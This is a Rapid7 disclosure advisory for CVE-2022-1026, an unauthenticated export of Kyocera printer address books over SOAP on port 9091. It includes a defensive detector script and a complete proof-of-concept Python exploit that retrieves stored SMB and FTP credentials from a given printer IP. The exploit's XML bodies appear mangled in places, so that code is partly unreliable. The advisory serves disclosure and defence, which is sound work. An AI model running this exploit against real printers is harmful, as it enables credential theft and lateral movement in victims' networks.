Last updated on Tue Mar 29 2022 1:29:15 PM GMT

Rapid7 researcher Aaron Herndon discovered that several models of Kyocera multifunction printers running vulnerable versions of Net Viewer unwittingly expose sensitive user information, including usernames and passwords, via an insufficiently protected address book export function. This vulnerability is an instance of CWE-522: Insufficiently Protected Credentials, and has an estimated baseline CVSS 3.1 score of 8.6, since the exposed credentials are used to authenticate to other endpoints, such as external FTP and SMB servers.

Product Description

Many Kyocera multifunction printers (MFPs) can be administered using Net Viewer. Two of the supported MFP models, both of which were tested, are the ECOSYS M2640idw and the TASKalfa 406ci. These printers are commonly found in home office and corporate environments around the world.

Credit

This issue, CVE-2022-1026, was discovered by Aaron Herndon, a security researcher at Rapid7. It is being disclosed in accordance with Rapid7’s Vulnerability Disclosure Policy.

Exploitation

Kyocera exposes a SOAP API on port 9091/TCP that is used for remote printer management via the Net Viewer thick client application. While the API supports authentication and the thick client does authenticate, capturing the client’s SOAP requests showed that the specific request to retrieve an address book, `POST /ws/km-wsdl/setting/address_book`, does not require an authenticated session. These address books, in turn, contain stored email addresses, usernames and passwords, which are normally used to store scanned documents on external services or to send them to users via e-mail.

Exploitation details

To exploit the vulnerability, an attacker only needs to be on a network that can reach the MFP’s listening SOAP service on port 9091/TCP. The screenshot below shows an unauthenticated SOAP request to this service, `POST /ws/km-wsdl/setting/address_book`, carrying the XML described.

This instructs the printer to prepare an address book object for download containing all of the sensitive data configured in the address book. The printer responds with an address book enumeration object number, which is ‘5’ in this case:

Once this object number is received, an attacker can place it in the “” value of a SOAP request with wsa:Action get_personal_address_list, sent to the same POST endpoint, as shown below.

This returns the printer’s address book, with all configured email addresses, FTP credentials and stored SMB network file share credentials used for scanning to network shares, in fairly readable XML:

Finally, credentials can be collected from the provided login_password fields:
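As an added example that is not part of the Rapid7 advisory or its PoC, the following detector recognises the two-step exchange described above from the defender’s side: it parses captured POST bodies sent to the address_book endpoint on 9091/TCP, extracts the wsa:Action from the SOAP header, and flags the create_personal_address_enumeration and get_personal_address_list calls. The capture records, the `_envelope` helper and the `flag_request`/`scan` names are constructed for this example; a real deployment would feed the records from a proxy or IDS.

```python
import xml.etree.ElementTree as ET

# Namespaces taken from the captured Kyocera address-book SOAP requests.
NS_ENV = "http://www.w3.org/2003/05/soap-envelope"
NS_WSA = "http://schemas.xmlsoap.org/ws/2004/08/addressing"
NS_KM = "http://www.kyoceramita.com/ws/km-wsdl/setting/address_book"
# The two wsa:Action values that together make up the unauthenticated address-book export.
EXPORT_ACTIONS = {
    NS_KM + "/create_personal_address_enumeration": "address book export prepared",
    NS_KM + "/get_personal_address_list": "address book contents retrieved",
}

def soap_action(body):
    """Return the wsa:Action text of a SOAP 1.2 envelope, or None if absent or not XML."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    action = root.find("{%s}Header/{%s}Action" % (NS_ENV, NS_WSA))
    return action.text.strip() if action is not None and action.text else None

def flag_request(record):
    """record = captured POST {'src','dst_port','path','body'}; returns (src, action, why) or None."""
    if record["dst_port"] != 9091 or not record["path"].endswith("/setting/address_book"):
        return None
    action = soap_action(record["body"])
    if action not in EXPORT_ACTIONS:
        return None
    return (record["src"], action.rsplit("/", 1)[1], EXPORT_ACTIONS[action])

def scan(records):  # keep only the flagged requests, in capture order
    return [hit for hit in map(flag_request, records) if hit]

def _envelope(action, inner):
    # Constructed sample envelope mirroring the structure of the requests shown in the advisory.
    return ('<SOAP-ENV:Envelope xmlns:SOAP-ENV="%s" xmlns:wsa="%s" xmlns:ns1="%s"><SOAP-ENV:Header>'
            '<wsa:Action SOAP-ENV:mustUnderstand="true">%s/%s</wsa:Action></SOAP-ENV:Header>'
            '<SOAP-ENV:Body>%s</SOAP-ENV:Body></SOAP-ENV:Envelope>' % (NS_ENV, NS_WSA, NS_KM, NS_KM, action, inner))

PATH = "/ws/km-wsdl/setting/address_book"
SAMPLE_CAPTURE = [  # constructed test data, not real traffic
    {"src": "10.0.0.5", "dst_port": 9091, "path": PATH, "body": _envelope(
        "create_personal_address_enumeration",
        "<ns1:create_personal_address_enumerationRequest><ns1:number>25</ns1:number></ns1:create_personal_address_enumerationRequest>")},
    {"src": "10.0.0.5", "dst_port": 9091, "path": PATH, "body": _envelope(
        "get_personal_address_list",
        "<ns1:get_personal_address_listRequest><ns1:enumeration>5</ns1:enumeration></ns1:get_personal_address_listRequest>")},
    {"src": "10.0.0.9", "dst_port": 9091, "path": PATH, "body": "not xml at all"},  # malformed, ignored
    {"src": "10.0.0.9", "dst_port": 443, "path": "/", "body": ""},  # unrelated traffic, ignored
]
```

Two hits from the same source within a few seconds (first the enumeration request, then the list retrieval) is the pattern worth alerting on; a lone create call may be the legitimate Net Viewer client.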

Exploitation proof of concept

A proof-of-concept (PoC) Python exploit is shown below. Note the time.sleep(5) call, which gives the printer time to generate the address book.

Python PoC code:

"""
Kyocera printer exploit
Extracts sensitive data stored in the printer address book, unauthenticated, including:
    *email addresses
    *SMB file share credentials used to write scan jobs to a network fileshare
    *FTP credentials
 
Author: Aaron Herndon, @ac3lives (Rapid7)
Date: 11/12/2021
Tested versions: 
    * ECOSYS M2640idw
    *  TASKalfa 406ci
    * 
 
Usage: 
python3 getKyoceraCreds.py printerip
"""
 
import requests
import xmltodict
import warnings
import sys
import time
warnings.filterwarnings("ignore")
 
url = "https://{}:9091/ws/km-wsdl/setting/address_book".format(sys.argv[1])
headers = {'content-type': 'application/soap+xml'}
# Submit an unauthenticated request to tell the printer that a new address book object creation is required
body = """<_soap-env3a_envelope _xmlns3a_soap-env="http://www.w3.org/2003/05/soap-envelope" _xmlns3a_soap-enc="http://www.w3.org/2003/05/soap-encoding" _xmlns3a_xsi="http://www.w3.org/2001/XMLSchema-instance" _xmlns3a_xsd="http://www.w3.org/2001/XMLSchema" _xmlns3a_wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" _xmlns3a_xop="http://www.w3.org/2004/08/xop/include" _xmlns3a_ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book"><_soap-env3a_header><_wsa3a_action _soap-env3a_mustunderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/create_personal_address_enumeration<_soap-env3a_body><_ns13a_create_personal_address_enumerationrequest><_ns13a_number>25"""
 
response = requests.post(url,data=body,headers=headers, verify=False)
strResponse = response.content.decode('utf-8')
#print(strResponse)
 
 
parsed = xmltodict.parse(strResponse)
# The SOAP request returns XML with an object ID as an integer stored in kmaddrbook:enumeration. We need this object ID to request the data from the printer.
getNumber = parsed['SOAP-ENV:Envelope']['SOAP-ENV:Body']['kmaddrbook:create_personal_address_enumerationResponse']['kmaddrbook:enumeration']
 
body = """<_soap-env3a_envelope _xmlns3a_soap-env="http://www.w3.org/2003/05/soap-envelope" _xmlns3a_soap-enc="http://www.w3.org/2003/05/soap-encoding" _xmlns3a_xsi="http://www.w3.org/2001/XMLSchema-instance" _xmlns3a_xsd="http://www.w3.org/2001/XMLSchema" _xmlns3a_wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" _xmlns3a_xop="http://www.w3.org/2004/08/xop/include" _xmlns3a_ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book"><_soap-env3a_header><_wsa3a_action _soap-env3a_mustunderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/get_personal_address_list<_soap-env3a_body><_ns13a_get_personal_address_listrequest><_ns13a_enumeration>{}""".format(getNumber)
 
print("Obtained address book object: {}. Waiting for book to populate".format(getNumber))
time.sleep(5)
print("Submitting request to retrieve the address book object...")
 
 
response = requests.post(url,data=body,headers=headers, verify=False)
strResponse = response.content.decode('utf-8')
#rint(strResponse)
 
parsed = xmltodict.parse(strResponse)
print(parsed['SOAP-ENV:Envelope']['SOAP-ENV:Body'])
 
print("nnObtained address book. Review the above response for credentials in objects such as 'login_password', 'login_name'")

Impact

The most likely attack scenario involving this vulnerability would be an attacker who is already inside the local network perimeter leveraging the ability to communicate directly with affected printers to learn usernames and passwords for the stored SMB and FTP file servers. In the case of SMB credentials, these can then be leveraged to establish a presence in the Windows domain of the target network.

Depending on how these external services are administered, the attacker may also be able to collect past (and future) print/scan jobs from the targeted printer, but the primary value of this vulnerability is lateral movement within the network. Note that the printer’s own credentials are not at risk (except in the case of reused passwords, of course); it is the credentials for the services where the printer normally stores scanned documents that are exposed by this vulnerability.

Remediation

First of all, MFPs must never be reachable directly from the Internet. While this is true for most LAN-centric technologies, it is especially true for printers and scanners, which are popular targets for opportunistic attackers. These devices tend to support only weak authentication mechanisms, even at the best of times, and rarely receive firmware updates that fix security issues. Thus, as long as only trusted users can reach these networked printers, the possibility of attack is limited to insiders and attackers who have otherwise already managed to establish a presence on the local network.

At the time of this disclosure, no patches or updated firmware are available for the affected devices. The version information displayed on a vulnerable ECOSYS M2640idw device is shown below, and we believe the correct version number for this software is the intermediate version listed, “2S0_1000.005.0012S5_2000.002.505”.

Due to the lack of patches, Kyocera customers are advised to disable the SOAP interface running on port 9091/TCP of affected MFPs. Details on how to disable this service can be found in the documentation for the specific MFP model. If SOAP access is required on the network for normal operation, users should ensure that address books do not contain sensitive, unchanging passwords.

One configuration that would render this vulnerability moot is to allow only public, anonymous FTP or SMB write access (but not read access) for storing scanned documents, with a separate process moving these documents securely over the network to their final destination. Email addresses would still be exposed, but these are of much less value to most attackers.

Disclosure timeline

  • November 2021: Issue identified by Aaron Herndon of Rapid7
  • Tue, November 16, 2021: Contacted Kyocera general support and other support channels
  • Fri, November 19, 2021: Case CS211119002 opened with Kyocera support
  • Mon, November 22, 2021: Details communicated to the vendor
  • Fri, January 7, 2022: JPCERT/CC case JVNVU#96890480 opened
    • More reliable security-specific contact discovered at Kyocera
  • Wed, January 19, 2022: Disclosure deadline extended to mid-March 2022
  • January-March 2022: Communication on workarounds and other mitigation measures
  • Fri, March 18, 2022: CVE-2022-1026 reserved
  • Tue, March 29, 2022: Public disclosure (this document)
